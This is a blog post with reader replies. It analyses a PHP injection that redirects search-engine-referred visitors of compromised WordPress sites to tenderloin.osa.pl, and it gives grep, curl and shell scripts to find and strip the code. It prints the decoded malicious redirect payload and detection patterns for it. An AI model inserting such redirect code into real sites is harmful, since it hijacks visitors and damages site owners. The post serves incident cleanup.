So earlier today I noticed a discrepancy in traffic to question-defense.com, and because of a previous incident I knew exactly where to look. Sure enough, a similar attack had been performed, which we are coining Search Engine Click Jacking. In this case we are sure that a single file's permissions were left open and the attackers were able to write PHP into the file, which caused traffic referred to our site from many of the major search engines to be redirected to tenderloin.osa.pl. Our site is built using WordPress; however, any site built in PHP with incorrect permissions on any of its files is vulnerable to this type of attack. Below is more information about the attack, how to search for it, and a simple bash script that will remove the infected code from PHP files on your web site.
Search Engine Click Jacking To tenderloin.osa.pl
This is a fairly clever attack that writes a minimal amount of code into vulnerable PHP files on your web site. The code is added to any PHP file whose permissions are not configured properly, so that the web server user can write to it. Below is a sample of the code that is injected into the PHP files, followed by the decoded version of the base64 insert.
Encoded Base64 Code Inserted Into Vulnerable PHP Files:
eval(base64_decode("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"));
Decoded Base64 Code Inserted Into Vulnerable PHP Files:
error_reporting(0);                       // suppress notices so nothing visible hints at the injection
$qazplm=headers_sent();
if (!$qazplm){                            // only redirect while headers can still be sent
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {                           // ignore clients that send no User-Agent
        if (stristr($referer,"yandex") or stristr($referer,"yahoo") or stristr($referer,"google") or
            stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or
            stristr($referer,"live.com") or stristr($referer,"aport") or stristr($referer,"nigma") or
            stristr($referer,"webalta") or stristr($referer,"baidu.com") or stristr($referer,"doubleclick.net") or
            stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or
            stristr($referer,"tinyurl.com") or stristr($referer,"clickbank.net") or stristr($referer,"blogspot.com") or
            stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
            // meant to skip cached/inurl: results; with "or" it only fails when both words appear
            if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                header("Location: http://tenderloin.osa.pl/");   // a bare Location header, i.e. a 302
                exit();
            }
        }
    }
}
As you can see above, the code simply performs a 302 redirect on any traffic to your site that is referred from yandex, yahoo, google, bing, rambler, live.com, gogo, aport, webalta, nigma, baidu, doubleclick.net, begun.ru, stumbleupon.com, bit.ly, tinyurl.com, clickbank.net, blogspot.com, myspace.com, facebook.com, or aol.com. The nifty part about this type of attack is that when a web developer visits the site they will think everything is fine, since a web developer rarely reaches their own site through a search, yet many sites get most of their traffic referred from sites such as Google.
I was able to duplicate the problem fairly quickly using curl from the Linux CLI and the Spoofy Chrome extension, since I have seen similar Search Engine Click Jacking attacks before. Resolving this issue is fairly simple: you can first see how many files are infected by using grep, as in the example below.
Example grep Command To Locate Infected PHP Files:
grep -r base64 * | less
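As an added example (not the post's own grep command), here is a small set of POSIX shell helpers that narrow the search to the eval(base64_decode( pattern in .php files, decode the payload so you can read what it does before touching anything, list the PHP files the web server could write to, and reproduce the referred-visit check with curl the way the post describes. It assumes GNU grep/find and coreutils base64 as found on a typical Linux host; the "infected" file it can write for testing is constructed here and carries a harmless payload, not the real one.

```sh
#!/bin/sh
# Added example, not from the original post. Triage helpers for the
# eval(base64_decode(...)) injection. Assumes GNU grep/find + coreutils base64.

# List PHP files under DIR that carry an eval(base64_decode( call.
# Narrower than `grep -r base64 *`: only .php files and only the eval form,
# so legitimate mentions of "base64" in library code do not match.
find_infected() {
    grep -rl --include='*.php' 'eval(base64_decode(' "$1"
}

# Print the decoded payload of the first eval(base64_decode("...")) in FILE.
# Read this before cleaning so you know what was actually planted.
# The '|' delimiter avoids escaping the '/' that base64 can contain.
decode_payload() {
    sed -n 's|.*eval(base64_decode("\([A-Za-z0-9+/=]*\)")).*|\1|p' "$1" |
        head -n 1 | base64 -d
}

# List PHP files under DIR that the web server could modify: group- or
# world-writable, plus owner-writable files owned by USER when given
# (e.g. apache or www-data). These are the files the injection can reach.
find_writable() {
    dir=$1; svc=${2:-}
    if [ -n "$svc" ]; then
        find "$dir" -type f -name '*.php' \
            \( \( -user "$svc" -perm -200 \) -o -perm -020 -o -perm -002 \)
    else
        find "$dir" -type f -name '*.php' \( -perm -020 -o -perm -002 \)
    fi
}

# Reproduce the symptom against your own URL: send a search-engine Referer and
# a browser User-Agent (both are required by the injected code) and print any
# Location header. A request without the Referer should not redirect.
check_redirect() {
    curl -sS -o /dev/null -D - -A 'Mozilla/5.0' -e 'https://www.google.com/' "$1" |
        grep -i '^Location:' || echo "no Location header returned"
}

# Write a constructed "infected" file to PATH for testing these helpers.
# The payload only echoes a string; it is not the real injected code.
write_sample() {
    payload=$(printf '%s' 'echo "constructed";' | base64)
    printf '<?php eval(base64_decode("%s")); ?>\n<?php echo "page"; ?>\n' "$payload" > "$1"
}

# Usage: sh scan.sh /var/www/html [webserver-user]
if [ $# -gt 0 ]; then
    echo "== PHP files containing eval(base64_decode("; find_infected "$1"
    echo "== PHP files the web server could write to"; find_writable "$1" "${2:-}"
fi
```

Run the scanner against the document root first and compare the two lists: a file that is both infected and still writable by the web server will simply be rewritten again after cleaning, so the permission fix has to come first.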
Be prepared for a lot of output, depending on how many PHP files have been infected. To fix the issue, first make sure that the permissions on the files that have had code added to them are changed to something that will not allow the web server user (often apache) to write to them. Once you have modified all of the file permissions to prevent this attack in the future, you can use the bash script below to remove the inserted code. The script only removes the code from the directory it is run in, so if there are multiple directories make sure to run it in each one. We left the script simple so that you would have to go into each directory containing infected files and make sure the permissions are set properly.
Bash Script To Remove Search Engine Click Jacking PHP Code:
#!/bin/bash
# For every PHP file in the current directory, strip the injected eval() statement.
for fl in *.php; do
    mv "$fl" "$fl.old"                      # keep the original under .old while it is rewritten
    sed 's/eval(base64_decode("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"));/ /g' "$fl.old" > "$fl"
    rm -f "$fl.old"                         # comment this line out to keep the .old backups
done
The specific base64 string may actually be different on your site; if so, you simply need to replace the text in the script starting with "eval(base64_decode(" and ending with "Q0KCX0="));". Also, if you want to keep a backup of the files being modified, you could comment out the "rm -f $fl.old" line and each original file will be saved with a .old extension.
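The note above, that the base64 string differs from site to site, is the weak point of the one-liner. As an added example (not the post's own script), here is a generalised cleaner that matches any eval(base64_decode("...")); statement whatever the encoded string is, recurses into subdirectories, keeps a .old copy of each file it touches and removes group/world write permission from the cleaned file so the web server cannot rewrite it. It assumes GNU sed/find/grep and is meant to be run as the file owner or root after you have read a decoded payload, because it removes every statement of that shape, not only this particular injection.

```sh
#!/bin/sh
# Added example, not the post's script. Generalised cleaner for the
# eval(base64_decode("...")); injection. Assumes GNU sed/find/grep.

# Remove every eval(base64_decode("...")); statement from FILE, keeping FILE.old.
# Writing through '>' onto the existing file keeps its owner and inode, whereas
# mv + redirect would leave a new file owned by whoever runs the script.
# The '|' delimiter avoids escaping the '/' that base64 can contain.
clean_file() {
    f=$1
    cp -p "$f" "$f.old"                 # -p keeps mode and timestamps on the backup
    sed 's|eval(base64_decode("[A-Za-z0-9+/=]*"));||g' "$f.old" > "$f"
    chmod go-w "$f"                     # the web server user must not be able to rewrite it
}

# Clean every .php file under DIR that contains the marker and print each path.
clean_tree() {
    grep -rl --include='*.php' 'eval(base64_decode(' "$1" |
    while IFS= read -r f; do
        clean_file "$f"
        echo "cleaned: $f"
    done
}

# Return 0 when no eval(base64_decode( remains in any .php file under DIR.
# The .old backups are not matched because they no longer end in .php.
verify_clean() {
    ! grep -rq --include='*.php' 'eval(base64_decode(' "$1"
}

# Usage: sh clean.sh /var/www/html
if [ $# -gt 0 ]; then
    clean_tree "$1"
    verify_clean "$1" && echo "no injected eval(base64_decode( left under $1"
fi
```

Once verify_clean reports nothing left, delete the .old files or move them out of the web root; they still contain the injected code and should not stay in a directory the web server can read.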
Thanks friend, you helped me solve the problem :) I used the program "FileSeek" to search for the term "eval(base64_decode(" and it came up immediately; I deleted it from the compromised files and tightened their security.
Thank you very much!
Hello o_o,
No problem man. Glad to hear it helped out and thanks for taking the time to leave feedback.
Thanks.
alex